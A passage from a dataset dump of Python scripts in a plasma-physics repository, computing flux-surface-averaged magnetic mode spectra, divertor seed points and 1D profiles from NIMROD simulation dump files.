\"/\" + fileName\n################################################################################\n# Run code\n################################################################################\n#initalize start position object\nstartPos = sp.startPosClass(nPoints,geom,randomPhi,phiZero)\n# generate starting points\nstartPos.calculateRZPhi()\n# write output\nstartPos.writeStartPos(writeFile)" }, { "alpha_fraction": 0.572534441947937, "alphanum_fraction": 0.6027249097824097, "avg_line_length": 32.4663200378418, "blob_id": "28d7f016da1597673fe44cd1b5f2a6d9dd01e526", "content_id": "7d262ce724f04a65615ea2e03ea1d4b7f2e98bf3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 19377, "license_type": "no_license", "max_line_length": 95, "num_lines": 579, "path": "/surfmn_fsa/fsa_surfmn.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n# fsa_surfmn is a class for calculating psi_mn and b_mn\n# note that the differs from previous versions, psimn was previous called bmn\n#\n# b_mn is calcualted to match the DIII-D surfmn calculation\n# M.J. Schaffer NF 48 (2008), 024004 eqn A.15\n#\n# the value of b_mn depends on the corrodinate system.\n# see eg., J Park Pop 15 (2008)\n# the value of psi_mn is more robust\n# for any set of Pest-like corrodinate systems psi_mn will be independant\n# of the raidal dimension\n# furthermore for any flux alligned coordinates (e.g. including Hamada, Boozer)\n# the value of psi_mn evalatuted at the rational surface will be the same.\n# \n# For pest-corrodinates B_mn is psi_mn / A * factors(2 pi)\n# where A is the flux-surface surface area calculated using the Jacobian\n# J_surfmn = qR^2/F * R^2 B_p\n#\nimport f90nml\nimport eval_comp_nimrod as ceval\nimport comp_fsa as cfsa\nimport matplotlib.pyplot as plt\nimport matplotlib.colors as mcolors\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline\nimport os\nimport h5py\nimport sys\nimport numpy as np\nimport pickle\n\nclass fsasurfmn:\n def __init__(self,dumpfile,nimrodin):\n #start with dump file and nimrod.in info\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.time=None\n self.step=None\n # next include info on how fsa's were performed\n self.mmax=None\n self.ifour=[]\n self.nfour=None\n self.setprofiles=False\n #finally end with the profiles\n self.psin=np.empty([1])\n self.psi=np.empty([1])\n self.rhon=np.empty([1])\n self.q=np.empty([1])\n self.qpsi=np.empty([1])\n self.vprime=np.empty([1])\n self.psimn=np.empty([1])\n self.psicmn=np.empty([1])\n self.psismn=np.empty([1])\n self.calc_surfmn = False\n self.s_surfmn = np.empty([1])\n self.phasemn = None\n def dump(self,file):\n pickle.dump(self.dumpfile,file)\n pickle.dump(self.nimrodin,file)\n pickle.dump(self.time,file)\n pickle.dump(self.step,file)\n # next include info on how fsa's were performed\n pickle.dump(self.mmax,file)\n pickle.dump(self.ifour,file)\n pickle.dump(self.nfour,file)\n pickle.dump(self.setprofiles,file)\n #finally end with the profiles\n if self.setprofiles==True:\n pickle.dump(self.psin,file)\n pickle.dump(self.psi,file)\n pickle.dump(self.rhon,file)\n pickle.dump(self.q,file)\n pickle.dump(self.vprime,file)\n pickle.dump(self.psimn,file)\n pickle.dump(self.psicmn,file)\n pickle.dump(self.psismn,file)\n pickle.dump(self.calc_surfmn,file)\n if self.calc_surfmn == True:\n pickle.dump(self.s_surfmn,file)\n\n def load(self,file):\n self.dumpfile=pickle.load(file)\n self.nimrodin=pickle.load(file)\n self.time=pickle.load(file)\n self.step=pickle.load(file)\n # next include info on how fsa's were performed\n self.mmax=pickle.load(file)\n self.ifour=pickle.load(file)\n self.nfour=pickle.load(file)\n self.setprofiles=pickle.load(file)\n #finally end with the profiles\n if self.setprofiles==True:\n self.psin=pickle.load(file)\n self.psi=pickle.load(file)\n self.rhon=pickle.load(file)\n self.q=pickle.load(file)\n self.vprime=pickle.load(file)\n self.psimn=pickle.load(file)\n self.psicmn=pickle.load(file)\n self.psismn=pickle.load(file)\n try:\n self.calc_surfmn=pickle.load(file)\n except:\n self.calc_surfmn=False\n if self.calc_surfmn == True:\n self.s_surfmn=pickle.load(file)\n\n def get_m_index(self,m):\n '''Return the index for the given m\n Return None if m is out of range'''\n if self.mmax==None:\n write(\"mmax has not be set in get_m_index\")\n raise\n else:\n if m>self.mmax:\n return None\n elif m<-1*self.mmax:\n return None\n else:\n return m+self.mmax\n\n def dummy_fsa(self,rzc,y,dy,evalnimrod,flag,fargs):\n '''\n Dummy integrand for complex fsa, this is used to get v' and q\n without running a true fsa\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth :v'\n dy(3)=dq: q\n dy(4)= dummy\n '''\n dy[4]=1.0\n return dy\n\n def surfmn_int(self,rzc,y,dy,evalnimrod,flag,fargs):\n '''\n Integrand for fluxsurface integration\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth\n dy(3)=dq\n dy(4)=dtheta\n dy(5)=J_smn/J_pest * 1/bdgth\n '''\n #self.mmax=fargs.get(\"mmax\")\n b0=np.array(cfsa.get_b0(evalnimrod,rzc,flag))\n b = evalnimrod.eval_field('b', rzc, dmode=0)\n rr =rzc[0]\n q=self.qpsi(fargs.get('psi'))\n jac=rr*q/b0[2]\n dy[4] = dy[2]/jac #dtheta\n dy[5] = rr * np.sqrt(b0[0]**2 + b0[1]**2) * dy[2] #add surfmn J\n for ii, im in enumerate(self.ifour):\n oset = ii * (4*self.mmax+1)\n ndx = evalnimrod.modelist.index(im)\n reb=np.real(b[:,ndx]) #im+1]) #im+1 is true for nonlinear only\n imb=np.imag(b[:,ndx]) #im+1]) #todo test nonlinear\n rBePsi=rr*(reb[1]*b0[0]-reb[0]*b0[1])\n iBePsi=rr*(imb[1]*b0[0]-imb[0]*b0[1])\n for im in range(self.mmax):\n nmth=-(self.mmax-im)*y[4] #negative m theta\n pmth=(im+1)*y[4] #positive m theta\n dy[6+im+oset]=(rBePsi*np.cos(nmth)-iBePsi*np.sin(nmth))*dy[2]\n dy[7+self.mmax+im+oset]=(rBePsi*np.cos(pmth)-iBePsi*np.sin(pmth))*dy[2]\n dy[7+2*self.mmax+im+oset]=-(rBePsi*np.sin(nmth)+iBePsi*np.cos(nmth))*dy[2]\n dy[7+3*self.mmax+im+oset]=-(rBePsi*np.sin(pmth)+iBePsi*np.cos(pmth))*dy[2]\n dy[6+self.mmax+oset]=rBePsi*dy[2]\n return dy\n\n\n def get_rho_q(self,q):\n try:\n return interp1d(self.q, self.rhon,\n kind='cubic', fill_value=\"extrapolate\")(q)\n except:\n print(f\"The safety factor {q} is not it the domain\")\n raise\n\n def get_psi_q(self,q):\n try:\n return interp1d(self.q, self.psi,\n kind='cubic', fill_value=\"extrapolate\")(q)\n except:\n print(f\"The safety factor {q} is not it the domain\")\n raise\n\n def get_field_rho(self,field,rhon):\n try:\n return interp1d(self.rhon, field, kind='cubic')(rhon)\n except:\n print(f\"Problem evaluitng field at rhon={rhon}\")\n raise\n\n def compute_phase(self):\n if self.phasemn is None:\n self.phasemn = np.arctan2(self.psismn, self.psicmn)\n\n\n def calculate(self,rzo=None,rzx=None,nsurf=150,eqflag=0,fargs={},**kwargs):\n self.ifour=fargs.get(\"ifour\")\n self.mmax=fargs['mmax']\n self.nfour=len(fargs['ifour'])\n self.setprofiles=True\n\n #first call to fsa is to calcualte q\n cevalnimrod=ceval.EvalCompNimrod(self.dumpfile,fieldlist='nvptbj')\n dvar, yvar, contours = cfsa.FSA(cevalnimrod, rzo, self.dummy_fsa, 1, \\\n nsurf=nsurf,depvar='eta',dpow=0.5,rzx=rzx,flag=eqflag,normalize=True, \\\n fargs=fargs)\n\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n #unevaluated interpoate\n self.qpsi=interp1d(dvar[2,:iend], dvar[7,:iend], kind='cubic')\n #second call to fsa is to calcualte b_ms ans psi_mn\n neq=2+self.nfour*(4*self.mmax+1)\n dvar,yvar,contours = cfsa.FSA(cevalnimrod, rzo, self.surfmn_int, neq, \\\n nsurf=nsurf,depvar='eta', dpow=0.5,rzx=rzx,flag=eqflag,normalize=False,\\\n fargs=fargs)\n\n iend=-1\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n\n psimn=np.zeros([self.nfour,2*self.mmax+1,iend])\n psicmn=np.zeros([self.nfour,2*self.mmax+1,iend])\n psismn=np.zeros([self.nfour,2*self.mmax+1,iend])\n for ii in range(self.nfour):\n oset = ii * (4*self.mmax+1)\n psicmn[ii,:,:]= yvar[2+oset:2*self.mmax+3+oset,:iend]*(np.pi*2.0)\n psismn[ii,0:self.mmax,:]=\\\n yvar[3+2*self.mmax+oset:3+3*self.mmax+oset,:iend]*(np.pi*2.0)\n psismn[ii,self.mmax+1:2*self.mmax+1,:]=\\\n yvar[3+3*self.mmax+oset:3+4*self.mmax+oset,:iend]*(np.pi*2.0)\n psimn=np.sqrt(np.square(psicmn)+np.square(psismn))\n\n s_surfmn = yvar[1,:iend]*np.pi*2\n \n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n #dvars\n self.psin=interp1d(dvar[1,:iend], dvar[0,:iend], kind='cubic')(self.rhon)\n self.psi=interp1d(dvar[1,:iend], dvar[2,:iend], kind='cubic')(self.rhon)\n self.vprime=np.pi*2*interp1d(dvar[1,:iend], dvar[6,:iend], kind='cubic')(self.rhon)\n self.q=interp1d(dvar[1,:iend], dvar[7,:iend], kind='cubic')(self.rhon)\n\n self.psicmn=interp1d(dvar[1,:iend],psicmn, kind='cubic')(self.rhon)\n self.psismn=interp1d(dvar[1,:iend],psismn, kind='cubic')(self.rhon)\n self.psimn =interp1d(dvar[1,:iend],psimn , kind='cubic')(self.rhon)\n\n self.s_surfmn = interp1d(dvar[1,:iend],s_surfmn, kind='cubic')(self.rhon)\n self.calc_surfmn = True\n\n def get_resonance(self,nn,mm,b_flag=\"psi\"):\n ''' Evaluate the resonant component of a b or psi at the given q=m/n'''\n if nn<1:\n print(\"nn must be positive by convention in get_resonance\")\n raise ValueError\n ndex=nn-1 #todo check\n mdex=self.get_m_index(mm)\n if ndex==None:\n print(f\"{nn} is not a n number in surfmn file\")\n raise ValueError\n if mdex==None:\n print(f\"{mm} is not an m number in surfmn file\")\n raise ValueError\n qres=mm/nn\n if b_flag==\"psi\":\n resfield=interp1d(self.rhon,self.psimn[ndex,mdex,:])\n elif b_flag==\"bmn\":\n if self.calc_surfmn==False:\n raise ValueError(\"Can not calculate b_mn, no S_surfmn\")\n else:\n resfield=interp1d(self.rhon,self.psimn[ndex,mdex,:]/self.s_surfmn*2e4)\n else:\n raise ValueError(\"b_flag not reconized\")\n\n return resfield(self.get_rho_q(qres))\n\n def get_phase(self,nn,mm,):\n ''' Evaluate the phase of psi at the given resonces'''\n if self.phasemn is None: self.compute_phase()\n if nn<1:\n print(\"nn must be positive by convention in get_phase\")\n raise ValueError\n ndex=nn-1 #todo check\n mdex=self.get_m_index(mm)\n if ndex==None:\n print(f\"{nn} is not a n number in surfmn file\")\n raise ValueError\n if mdex==None:\n print(f\"{mm} is not an m number in surfmn file\")\n raise ValueError\n qres=mm/nn\n return interp1d(self.rhon,self.phasemn[ndex,mdex,:])(self.get_rho_q(qres))\n\n def plot(self,pargs={}):\n if \"field\" in pargs:\n field=pargs[\"field\"]\n else:\n field='p'\n qmin = np.amin(self.q)\n qmax = np.amax(self.q)\n if (qmin < 0.0 and qmax < 0.0):\n self.signq = -1\n elif (qmin > 0.0 and qmax > 0.0):\n self.signq = +1\n else:\n self.signq = None\n if field=='b':\n if self.calc_surfmn==True:\n for im,imode in enumerate(self.ifour):\n self.plot_radial_bmn(im,imode,pargs)\n self.plot_surfmn_bmn(im,imode,pargs)\n else:\n print(\"S no caluted\")\n raise ValueError\n else: \n for im,imode in enumerate(self.ifour):\n self.plot_radial(im,imode,pargs)\n self.plot_surfmn(im,imode,pargs)\n\n def plot_radial(self,ii,imode,pargs={}):\n\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n if abs(self.time - 0.0005413792981815724) < 1.0e-6:\n title=f\"Peak Pulse (0.5ms)\\n $\\psi$(n={int(imode)})\"\n elif abs(self.time - 0.00500030382482843) < 1.0e-6:\n title=f\"Early Slow Growth (5ms)\\n $\\psi$(n={int(imode)})\"\n elif abs(self.time - 0.002969027824826107) < 1.0e-6:\n title=f\"Earlier in Time (3ms)\\n $\\psi$(n={int(imode)})\"\n elif abs(self.time - 0.008385763824834448) < 1.0e-6:\n title=f\"Late Slow Growth (8ms)\\n $\\psi$(n={int(imode)})\"\n else:\n title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n ylabel=f\"$\\psi_m$ [mWb]\"\n colorlist = list(mcolors.TABLEAU_COLORS)\n xlabel=r'$\\rho_N$'\n fontsize=24\n legendfont=20\n if imode==1:\n if self.signq == -1:\n mlist=range(-4,0)#mlist=range(-4,1)\n else:\n mlist=range(0,4)#mlist=range(-4,1)\n elif imode==2:\n mlist=range(-6,-1)\n else:\n mstart=-2*imode\n mlist=range(mstart,mstart+imode+1)\n if 'mlists' in pargs:\n if ii<len(pargs['mlists'][ii]):\n mlist=pargs['mlists'][ii]\n rhomax=np.max(self.rhon)\n for im,this_m in enumerate(mlist):\n this_i = self.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(abs(this_m))\n tc=colorlist[im%len(colorlist)]\n ax.plot(self.rhon/rhomax,self.psimn[ii,this_i,:]*1000, color=tc, label=mlbl)\n try:\n qlist=pargs['qlists'][ii]\n except:\n if imode==1:\n if self.signq == -1:\n qlist=range(-4,-1)\n else:\n qlist=range(1,5)\n elif imode==2:\n qlist=[-4,-3,-2.5,-2,-1.5]\n elif imode==3:\n qlist=[-3,-2.33, -2,-1.67,-1.33]\n elif imode==4:\n qlist=[-3,-2,-1.75,-1.5,-1.25]\n elif imode==5:\n qlist=[-3,-2,-1.8,-1.6,-1.4,-1.2]\n else:\n qlist=[-4,-3,-2]\n print(qlist)\n print(pargs)\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {abs(qq):.1f}\"\n tc=colorlist[iq]\n # if (qq in [-3,-2]): #aps/paper\n # ax.axvline(irho/rhomax,ls=':',color=tc, label=qlbl)\n #if (qq in [-3,-2]):\n ax.axvline(irho/rhomax,ls=':',color=tc, label=qlbl)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0,\n frameon=True,\n fontsize=legendfont,\n ncol=1,\n handlelength=1,\n handletextpad=0.4)\n plt.title(title,fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n plt.ylabel(ylabel,fontsize=fontsize)\n plt.tight_layout()\n plt.show()\n \n def plot_radial_bmn(self,ii,imode,pargs={}):\n fig = plt.figure(figsize=(8,6))\n ax=fig.add_subplot(111)\n title=f\"$B$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n title=f\"$B$(n={int(imode)})\"\n ylabel=f\"$B_r$ [G]\"\n colorlist = list(mcolors.TABLEAU_COLORS)\n xlabel=r'$\\rho_N$'\n fontsize=24\n legendfont=20\n if imode==1:\n if self.signq == -1:\n mlist=range(-4,0)\n else:\n mlist=range(1,5)\n elif imode==2:\n mlist=range(-6,-1)\n else:\n mstart=-2*imode\n mlist=range(mstart,mstart+imode+1)\n if 'mlists' in pargs:\n if ii<len(pargs['mlists'][ii]):\n mlist=pargs['mlists'][ii]\n rhomax=np.max(self.rhon)\n for im,this_m in enumerate(mlist):\n this_i = self.get_m_index(this_m)\n if this_i!= None:\n mlbl = \"m = \" + str(abs(this_m))\n tc=colorlist[im%len(colorlist)]\n ax.plot(self.rhon / rhomax,\n 2 * self.psimn[ii,this_i,:] / np.abs(self.s_surfmn) * 10000,\n color=tc,\n label=mlbl)\n try:\n qlist=pargs['qlists'][ii]\n except:\n if imode==1:\n if self.signq == -1:\n qlist=range(-4,-1)\n else:\n qlist=range(2,5)\n elif imode==2:\n qlist=[-4,-3,-2.5,-2,-1.5]\n elif imode==3:\n qlist=[-3,-2.33, -2,-1.67,-1.33]\n elif imode==4:\n qlist=[-3,-2,-1.75,-1.5,-1.25]\n elif imode==5:\n qlist=[-3,-2,-1.8,-1.6,-1.4,-1.2]\n else:\n qlist=[-4,-3,-2]\n print(qlist)\n print(pargs)\n for iq,qq in enumerate(qlist):\n try:\n irho = self.get_rho_q(qq)\n qlbl = f\"q = {abs(qq):.1f}\"\n tc=colorlist[iq]\n if qq in [2,-2]:\n tc = colorlist[2]\n if qq in [3,-3]:\n tc = colorlist[3]\n if qq in [4,-4]:\n tc = colorlist[4]\n # if (qq in [-3,-2]): #aps/paper\n # ax.axvline(irho/rhomax,ls=':',color=tc, label=qlbl)\n #if (qq in [-3,-2]):\n #ax.axvline(irho/rhomax,ls=':',color=tc, label=qlbl)\n ax.axvline(irho/rhomax,ls=':',color=tc)\n except:\n print(f\"q={qq:.2f} is not in the domain\")\n ax.axhline(0,ls='-',c='k')\n ax.legend(loc=0,\n frameon=True,\n fontsize=legendfont,\n ncol=1,\n handlelength=1,\n handletextpad=0.4)\n plt.title(title,fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n plt.ylabel(ylabel,fontsize=fontsize)\n plt.tight_layout()\n plt.show()\n\n\n def plot_surfmn(self,im,imode,surfmn,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n # Set titles and labels\n title=f\"$\\psi$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n # set contour levels, i could generalize this further if needed\n levels=301\n vmax=np.amax(self.psimn[im,:,:])*1000\n levels=np.linspace(0,vmax,301)\n cbar_ticks=np.linspace(0,vmax,11)\n # Update plot based on keys in kwargs\n xlabel=\"Poloidal Mode Number m\"\n fontsize=18\n # set up mrange()\n qmin=np.amin(self.q)\n qmax=np.amax(self.q)\n mrange=np.linspace(qmin,qmax)\n #create the surfmn plot\n plt.set_cmap('nipy_spectral')\n m=range(-self.mmax,self.mmax+1)\n rhomax=np.max(self.rhon)\n mv, rv = np.meshgrid(m, self.rhon/rhomax, sparse=False, indexing='ij')\n conf=plt.contourf(mv,rv,np.clip(self.psimn[im,:,:]*1000,0,None),levels=levels,vmax=vmax)\n plt.plot(imode*mrange,self.get_rho_q(mrange)/rhomax,c='w')\n plt.title(title,fontsize=fontsize)\n plt.ylabel(r'$\\rho_N$',fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n plt.xlim(-self.mmax,self.mmax)\n plt.show()\n\n def plot_surfmn_bmn(self,im,imode,surfmn,pargs={}):\n fig = plt.figure(figsize=(10,8))\n ax=fig.add_subplot(111)\n # Set titles and labels\n title=f\"$B_r$(n={int(imode)}) at {self.time*1000:.3f}ms\"\n title=f\"$B_r$(n={int(imode)}) [G]\"\n # set contour levels, i could generalize this further if needed\n levels=301\n vmax=2 * np.amax(self.psimn[im,:,:] / np.abs(self.s_surfmn))*10000\n #vmax=4.2\n #vmax=4.8\n levels=np.linspace(0,vmax,301)\n cbar_ticks=np.linspace(0,vmax,11)\n # Update plot based on keys in kwargs\n xlabel=\"Poloidal Mode Number m\"\n fontsize=18\n # set up mrange()\n qmin=np.amin(self.q)\n qmax=np.amax(self.q)\n mrange=np.linspace(qmin,qmax)\n #create the surfmn plot\n plt.set_cmap('nipy_spectral')\n m=range(-self.mmax,self.mmax+1)\n psimax=np.max(self.psi)\n mv, rv = np.meshgrid(m, self.psi/psimax, sparse=False, indexing='ij')\n conf=plt.contourf(mv,\n rv,\n np.clip(2 * self.psimn[im,:,:] / np.abs(self.s_surfmn) * 10000, 0, None),\n levels=levels,\n vmax=vmax)\n plt.plot(imode*mrange,self.get_psi_q(mrange)/psimax,c='w')\n #plt.plot(imode*mrange+1,self.get_psi_q(mrange)/psimax,c='k',ls='--')\n plt.plot(imode*mrange+2,self.get_psi_q(mrange)/psimax,c='r',ls='-.')\n #plt.plot(imode*mrange+3,self.get_psi_q(mrange)/psimax,c='k',ls=':')\n plt.title(title,fontsize=fontsize)\n plt.ylabel(r'$\\psi_N$',fontsize=fontsize)\n plt.xlabel(xlabel,fontsize=fontsize)\n cbar=fig.colorbar(conf,ticks=cbar_ticks)\n plt.xlim(-self.mmax,self.mmax)\n plt.show()\n\n def get_dumptime(self):\n ''' Open the hdf5 dumpfile read the dump time and dumpstep '''\n with h5py.File(self.dumpfile, 'r') as h5file:\n try:\n self.time=h5file[\"dumpTime\"].attrs['vsTime']\n self.step=int(h5file[\"dumpTime\"].attrs['vsStep'])\n except:\n print(f\"Error reading time or step in {self.dumpfile}\")\n raise\n" }, { "alpha_fraction": 0.4447077512741089, "alphanum_fraction": 0.5221168994903564, "avg_line_length": 29.14285659790039, "blob_id": "b7f69b74b75f2d31a7b07ea9b3e48313f0a0b95d", "content_id": "ac2fff17249923a330b22bd973676f408d49cccb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1266, "license_type": "no_license", "max_line_length": 63, "num_lines": 42, "path": "/nimflSeed/divSeed.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\nimport numpy as np\nimport itertools as iter\nimport random as ran\n\nSEGMENTS = [\n ((1.016, 0.000), (1.016,-1.223)),\n ((1.016,-1.223), (1.153,-1.363)),\n ((1.153,-1.363), (1.372,-1.363)),\n ((1.372,-1.250), (1.682,-1.250))\n]\n\ndef write_start(file_name, xy, phi):\n npts = xy.shape[0] * phi.shape[0]\n with open(file_name,'w') as thisFile:\n thisFile.write(str(npts)+\"\\n\")\n for [r,z],p in iter.product(xy,phi):\n thisLine = '{: 16.16e}'.format(r) + \", \"\n thisLine+= '{: 16.16e}'.format(z) + \", \"\n thisLine+= '{: 16.16e}'.format(p) + \"\\n\"\n thisFile.write(thisLine)\n\ndef div_seed():\n nphi = 360\n nl = 100\n dtan = 0.01\n BASENAME = \"start_positions.dat\"\n counter = 0\n for segment in SEGMENTS:\n start = np.array(segment[0])\n end = np.array(segment[1])\n tan = np.array([-end[1] + start[1], end[0] - start[0]])\n length = np.linalg.norm(tan)\n tan = dtan/length * tan\n l_arr = np.linspace(start,end,nl)\n l_arr = l_arr + tan\n phi = np.linspace(0, 2*np.pi, nphi)\n file_name = BASENAME + f\"_{counter}\"\n write_start(file_name, l_arr, phi)\n counter += 1\nif __name__ == \"__main__\":\n div_seed()\n" }, { "alpha_fraction": 0.6062063574790955, "alphanum_fraction": 0.6381691098213196, "avg_line_length": 33.65053939819336, "blob_id": "b0b5ba8454d7a7224259e0aa7568a6ea0b8c966a", "content_id": "82c3dda26351d9c72c4a91cbc59a61fa7e266d9b", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6445, "license_type": "no_license", "max_line_length": 87, "num_lines": 186, "path": "/surfmn/profiles.py", "repo_name": "echowell/nimrodscripts", "src_encoding": "UTF-8", "text": "#!/usr/bin/env python3\n#\n#profiles is a class for calculating 1D profiles\n# using the flux surface integration\n#\n#\nimport f90nml\nfrom eval_nimrod import *\nfrom field_class import *\nfrom fsa import *\nimport matplotlib.pyplot as pl\nfrom scipy.interpolate import interp1d,splev,UnivariateSpline\nimport os\nimport h5py\nimport sys\nimport numpy as np\nimport pickle\n\nclass Profiles:\n def __init__(self,dumpfile,nimrodin):\n self.dumpfile=dumpfile\n self.nimrodin=nimrodin\n self.setprofiles=False\n self.psin=np.empty([1])\n self.psi=np.empty([1])\n self.rhon=np.empty([1])\n self.bigr=np.empty([1])\n self.nd=np.empty([1])\n self.p=np.empty([1])\n self.pe=np.empty([1])\n self.ti=np.empty([1])\n self.te=np.empty([1])\n self.q=np.empty([1])\n self.jpar=np.empty([1])\n self.kpol=np.empty([1])\n self.omegator=np.empty([1])\n self.vprime=np.empty([1])\n self.f=np.empty([1])\n self.invr2=np.empty([1])\n def dump(self,file):\n pickle.dump(self.dumpfile,file)\n pickle.dump(self.nimrodin,file)\n pickle.dump(self.setprofiles,file)\n if self.setprofiles==True:\n pickle.dump(self.psin,file)\n pickle.dump(self.psi,file)\n pickle.dump(self.rhon,file)\n pickle.dump(self.bigr,file)\n pickle.dump(self.nd,file)\n pickle.dump(self.p,file)\n pickle.dump(self.pe,file)\n pickle.dump(self.ti,file)\n pickle.dump(self.te,file)\n pickle.dump(self.q,file)\n pickle.dump(self.jpar,file)\n pickle.dump(self.kpol,file)\n pickle.dump(self.omegator,file)\n pickle.dump(self.vprime,file)\n pickle.dump(self.f,file)\n pickle.dump(self.invr2,file)\n def load(self,file):\n self.dumpfile=pickle.load(file)\n print(self.dumpfile)\n self.nimrodin=pickle.load(file)\n print(self.nimrodin)\n self.setprofiles=pickle.load(file)\n print(self.setprofiles)\n if self.setprofiles==True:\n self.psin=pickle.load(file)\n self.psi=pickle.load(file)\n self.rhon=pickle.load(file)\n self.bigr=pickle.load(file)\n self.nd=pickle.load(file)\n self.p=pickle.load(file)\n self.pe=pickle.load(file)\n self.ti=pickle.load(file)\n self.te=pickle.load(file)\n self.q=pickle.load(file)\n self.jpar=pickle.load(file)\n self.kpol=pickle.load(file)\n self.omegator=pickle.load(file)\n self.vprime=pickle.load(file)\n self.f=pickle.load(file)\n self.invr2=pickle.load(file)\n def fsaint(self,rzc,dy,evalnimrod,isurf):\n '''\n Integrand for fluxsurface integration\n Flux surface averge quantities (f/bdgrth where y[2]=1/bdgrth)\n dy(0)=dl/deta or d eta/dl\n dy(1)=dr/deta or dr/dl\n dy(2)=1/bdgth\n dy(3)=dq\n '''\n n0 = np.array(evalnimrod.eval_field('n',rzc,dmode=0,eq=3))\n v0 = np.array(evalnimrod.eval_field('v', rzc, dmode=0, eq=3)) #eq + n0\n p0 = np.array(evalnimrod.eval_field('p',rzc,dmode=0,eq=3))\n pe0 = np.array(evalnimrod.eval_field('pe',rzc,dmode=0,eq=3))\n ti0 = np.array(evalnimrod.eval_field('ti',rzc,dmode=0,eq=3))\n te0 = np.array(evalnimrod.eval_field('te',rzc,dmode=0,eq=3))\n b0 = np.array(evalnimrod.eval_field('b', rzc, dmode=0, eq=3))\n j0 = np.array(evalnimrod.eval_field('j',rzc,dmode=0,eq=3))\n\n # set up useful working variables\n modbp = np.sqrt(np.dot(b0[0:2],b0[0:2]))\n modb=np.sqrt(np.dot(b0,b0))\n jpar=np.dot(j0,b0)/modb #\n\n _small = 1.0e-12\n #update integrands\n dy[4]=n0*dy[2]\n dy[5]=np.dot(v0[0:2],b0[0:2])*dy[2]/max(modbp**2,_small)#Kpol\n dy[6]=v0[2]*dy[2]/rzc[0] #omega_t\n dy[7]=p0*dy[2] #p0\n dy[8]=pe0*dy[2] #pe\n dy[9]=ti0*dy[2] #ti\n dy[10]=te0*dy[2]#te\n dy[11]=jpar*dy[2] #jpar\n dy[12]=rzc[0]*b0[2]*dy[2] #F\n dy[13]=dy[2]/rzc[0]**2 #1/R^2\n #update bigr\n self.bigr[isurf]=max(self.bigr[isurf],rzc[0])\n return dy\n\n def get_omega_exb(self, n, rhon=None):\n omega_exb=n*(4*np.pi**2*self.q*self.kpol/self.vprime-self.omegator)\n if rhon==None:\n return omega_exb\n return interp1d(self.rhon, omega_exb, kind='cubic')(rhon)\n\n def get_rho_q(self,q):\n try:\n return interp1d(self.q,self.rhon, kind='cubic',fill_value=\"extrapolate\")(q)\n except:\n print(f\"The safety factor {q} is not it the domain\")\n raise\n\n def get_field_rho(self,field,rhon):\n try:\n return interp1d(self.rhon,field, kind='cubic')(rhon)\n except:\n print(f\"Problem evaluitng field at rhon={rhon}\")\n raise\n\n def calculate(self,rzo=None,rzx=None,**kwargs):\n mi=kwargs.get(\"mi\",3.3435860e-27)\n qe=kwargs.get(\"qe\",1.609e-19)\n nsurf=kwargs.get(\"nsurf\",150)\n\n self.setprofiles=True\n self.bigr=np.full([nsurf],-np.inf,dtype=np.float64)\n\n evalnimrod=EvalNimrod(self.dumpfile,fieldlist='nvptbj')\n dvar, yvar, contours = FSA(evalnimrod, rzo, self.fsaint, 10, nsurf=nsurf, \\\n depvar='eta', dpow=0.5, rzx=rzx,normalize=True)\n\n iend=-1\n temp = np.where(yvar[0,:]==np.nan)\n print(temp)\n for ix,ivar in enumerate(yvar[0,:]):\n print(ix,ivar)\n print(np.isnan(yvar[:,:iend]).any())\n while np.isnan(yvar[:,iend]).any():\n iend -= 1\n iend += yvar.shape[1]+1\n rhomin=np.min(dvar[1,:iend])\n rhomax=np.max(dvar[1,:iend])\n self.rhon = np.linspace(rhomin,rhomax,200,endpoint=True)\n #dvars\n tempbigr=np.copy(self.bigr)\n self.psin=interp1d(dvar[1,:iend], dvar[0,:iend], kind='cubic')(self.rhon)\n self.psi=interp1d(dvar[1,:iend], dvar[2,:iend], kind='cubic')(self.rhon)\n self.bigr=interp1d(dvar[1,:iend], tempbigr[:iend], kind='cubic')(self.rhon)\n self.vprime=np.pi*2*interp1d(dvar[1,:iend], dvar[6,:iend], kind='cubic')(self.rhon)\n self.q=interp1d(dvar[1,:iend], dvar[7,:iend], kind='cubic')(self.rhon)\n\n # yvars\n self.nd=interp1d(dvar[1,:iend], yvar[0,:iend], kind='cubic')(self.rhon)\n self.kpol=interp1d(dvar[1,:iend], yvar[1,:iend], kind='cubic')(self.rhon)\n self.omegator=interp1d(dvar[1,:iend], yvar[2,:iend], kind='cubic')(self.rhon)\n self.p=interp1d(dvar[1,:iend], yvar[3,:iend], kind='cubic')(self.rhon)\n 